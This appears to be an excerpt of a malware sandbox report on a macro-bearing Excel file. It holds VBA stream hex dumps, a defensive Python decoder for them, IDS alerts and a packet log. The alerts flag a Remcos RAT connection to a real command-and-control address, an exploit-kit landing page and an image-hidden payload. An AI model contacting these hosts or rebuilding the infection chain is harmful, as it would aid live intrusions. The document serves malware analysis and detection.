                                                                              Data Raw:49 44 3d 22 7b 45 41 34 42 38 39 35 43 2d 39 44 34 44 2d 34 39 46 43 2d 39 44 42 39 2d 32 37 30 39 46 41 44 42 35 32 45 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:104
                                                                              Entropy:3.0488640812019017
                                                                              Base64 Encoded:False
                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:2644
                                                                              Entropy:3.9994516951323855
                                                                              Base64 Encoded:False
                                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:553
                                                                              Entropy:6.36532536434528
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 d9 f7 df 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
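The two streams dumped above can be checked directly from the bytes the report prints. The Python below is an added example and not part of the Joe Sandbox report: it decodes the module-name list in _VBA_PROJECT_CUR/PROJECTwm (which names only the four document modules ThisWorkbook, Sheet1, Sheet2 and Sheet3) and decodes the MS-OVBA CompressedContainer header that begins the dir stream. The "Base64 Encoded: True" flag on the dir stream is a content heuristic; the leading 0x01 signature byte and the chunk header 0xB225 (one compressed chunk of 552 bytes, which plus the signature byte gives the reported 553-byte stream size) show it is an MS-OVBA compressed container, which also explains its higher entropy. The hex constants are copied from the Data Raw lines above; the full dir stream is not on the page, so only its header is decoded.

```python
"""Triage helpers for the VBA project streams dumped above.

Added example; not part of the Joe Sandbox report. It works on the raw bytes
the report prints, so everything here runs offline.
"""
import struct

# Copied from the report: the full PROJECTwm stream (104 bytes) as printed in
# the "Data Raw" line for _VBA_PROJECT_CUR/PROJECTwm.
PROJECTWM_HEX = (
    "54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 "
    "72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 "
    "65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 "
    "74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 "
    "00 00 00 00"
)

# Copied from the report: the first bytes of _VBA_PROJECT_CUR/VBA/dir and the
# stream size it lists. Only the container header is decoded here.
DIR_HEAD_HEX = "01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48"
DIR_STREAM_SIZE = 553


def parse_projectwm(data: bytes) -> list[str]:
    """Return the module names listed in a PROJECTwm stream (MS-OVBA 2.3.3).

    The stream is a sequence of (ANSI name + NUL, UTF-16LE name + NUL NUL)
    records terminated by a two-byte 0x0000 marker. Office writes the same
    name in both encodings; a mismatch is worth flagging during triage, so
    the function raises instead of silently picking one spelling.
    """
    names = []
    pos = 0
    while pos < len(data):
        if data[pos:pos + 2] == b"\x00\x00":
            break  # end-of-list marker
        end = data.index(b"\x00", pos)
        ansi = data[pos:end].decode("latin-1")
        pos = end + 1
        # UTF-16LE is scanned per 2-byte unit; the first 00 00 unit terminates.
        end = pos
        while data[end:end + 2] != b"\x00\x00":
            end += 2
        wide = data[pos:end].decode("utf-16-le")
        pos = end + 2
        if ansi != wide:
            raise ValueError(f"ANSI/Unicode module name mismatch: {ansi!r} vs {wide!r}")
        names.append(ansi)
    return names


def parse_compressed_container_header(head: bytes) -> dict:
    """Decode the MS-OVBA CompressedContainer header at the start of a dir stream.

    Byte 0 is the signature (must be 0x01). Bytes 1-2 are the first
    CompressedChunkHeader (little-endian): bits 0-11 hold CompressedChunkSize - 3,
    bits 12-14 must be 0b011, and bit 15 is 1 for a compressed chunk.
    """
    if head[0] != 0x01:
        raise ValueError("not an MS-OVBA compressed container (signature != 0x01)")
    (hdr,) = struct.unpack_from("<H", head, 1)
    if (hdr >> 12) & 0b111 != 0b011:
        raise ValueError("bad CompressedChunkSignature bits in chunk header")
    return {
        "chunk_size": (hdr & 0x0FFF) + 3,   # bytes, including the 2-byte header
        "compressed": bool(hdr & 0x8000),
    }


def dir_stream_is_single_chunk(head: bytes, stream_size: int) -> bool:
    """True when the stream is exactly one signature byte plus one chunk."""
    return 1 + parse_compressed_container_header(head)["chunk_size"] == stream_size


if __name__ == "__main__":
    print("VBA modules:", parse_projectwm(bytes.fromhex(PROJECTWM_HEX)))
    head = bytes.fromhex(DIR_HEAD_HEX)
    print("dir chunk header:", parse_compressed_container_header(head),
          "single chunk:", dir_stream_is_single_chunk(head, DIR_STREAM_SIZE))
```

PROJECTwm gives the module list without decompressing anything; to read the dir stream itself (project name, references, module stream offsets) the chunk after the header has to be run through the MS-OVBA decompressor, which oletools' olevba does for you.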
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-28T22:29:41.372209+0200 | TCP | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 49173 | 2404 | 192.168.2.22 | 192.3.101.172
2024-08-28T22:29:42.525533+0200 | TCP | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 49174 | 2404 | 192.168.2.22 | 192.3.101.172
2024-08-28T22:29:40.121636+0200 | TCP | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 80 | 49172 | 198.12.81.228 | 192.168.2.22
2024-08-28T22:29:40.121636+0200 | TCP | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 80 | 49172 | 198.12.81.228 | 192.168.2.22
2024-08-28T22:29:42.678496+0200 | TCP | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 49175 | 80 | 192.168.2.22 | 178.237.33.50
2024-08-28T22:29:39.341451+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 443 | 49171 | 207.241.232.154 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 22:29:18.766670942 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:18.766705036 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:18.766877890 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:18.772380114 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:18.772392035 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:19.424738884 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:19.424837112 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:19.429981947 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:19.429991007 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:19.430228949 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:19.430285931 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:19.493947983 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:19.536541939 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:19.709883928 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:19.709933996 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:19.709944010 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:19.709978104 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:19.717863083 CEST | 49161 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:19.717875957 CEST | 443 | 49161 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:19.724956036 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:19.729867935 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:19.729962111 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:19.730010986 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:19.734812021 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225430012 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225444078 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225450039 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225457907 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225467920 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225496054 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225501060 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225506067 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225511074 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225517988 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.225614071 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.225614071 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.225614071 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.233177900 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.233191013 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.233206034 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.233251095 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.233268023 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.240915060 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.312248945 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312268972 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312280893 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312293053 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312304020 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312318087 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.312339067 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.312347889 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.312602043 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312648058 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.312727928 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312772036 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.312802076 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312813997 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312851906 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.312865973 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312877893 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.312915087 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.313643932 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.313658953 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.313668966 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.313682079 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.313692093 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.313693047 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.313708067 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.313719988 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.313738108 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.314472914 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.314485073 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.314500093 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.314522028 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.314537048 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.314543962 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.314551115 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.314579964 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.315289021 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.315335035 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.315442085 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.315484047 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.317277908 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.317343950 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403464079 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403477907 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403487921 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403500080 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403512001 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403529882 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403553009 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403609991 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403615952 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403625965 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403637886 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403647900 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403670073 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403670073 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403701067 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403772116 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403784990 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403800011 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403810978 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403840065 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403840065 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403840065 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403861046 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.403904915 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.403944016 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404053926 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404066086 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404077053 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404093027 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404124022 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404767036 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404778004 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404788017 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404808044 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404808044 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404824972 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404901028 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404912949 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404922962 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404933929 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.404934883 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404944897 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404958010 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.404970884 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405049086 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405090094 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405220032 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405232906 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405241966 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405251980 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405261040 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405261040 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405262947 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405275106 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405291080 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405298948 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405906916 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405917883 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405927896 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405941963 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.405944109 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405956984 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405965090 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.405982018 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.406075001 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.406117916 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.602848053 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.607760906 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607779980 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607790947 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607803106 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607814074 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607829094 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.607848883 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.607858896 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607870102 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607872963 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.607882023 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607897043 CEST | 80 | 49162 | 198.12.81.228 | 192.168.2.22
Aug 28, 2024 22:29:20.607908964 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.607935905 CEST | 49162 | 80 | 192.168.2.22 | 198.12.81.228
Aug 28, 2024 22:29:20.810530901 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:20.810564041 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:20.810645103 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:20.815598965 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:20.815612078 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:21.465940952 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:21.466008902 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:21.472065926 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:21.472074032 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:21.472302914 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:21.472356081 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:21.546868086 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:21.592500925 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:21.756696939 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:21.756752014 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:21.756773949 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:21.756786108 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:21.763731956 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:21.763742924 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:21.763751030 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:21.763803959 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:22.100320101 CEST | 49164 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:22.100359917 CEST | 443 | 49164 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:22.100428104 CEST | 49164 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:22.100719929 CEST | 49164 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:22.100739956 CEST | 443 | 49164 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:22.772983074 CEST | 443 | 49164 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 22:29:22.773055077 CEST | 49164 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:22.777231932 CEST | 49164 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 22:29:22.777244091 CEST | 443 | 49164 | 88.99.66.38 | 192.168.2.22
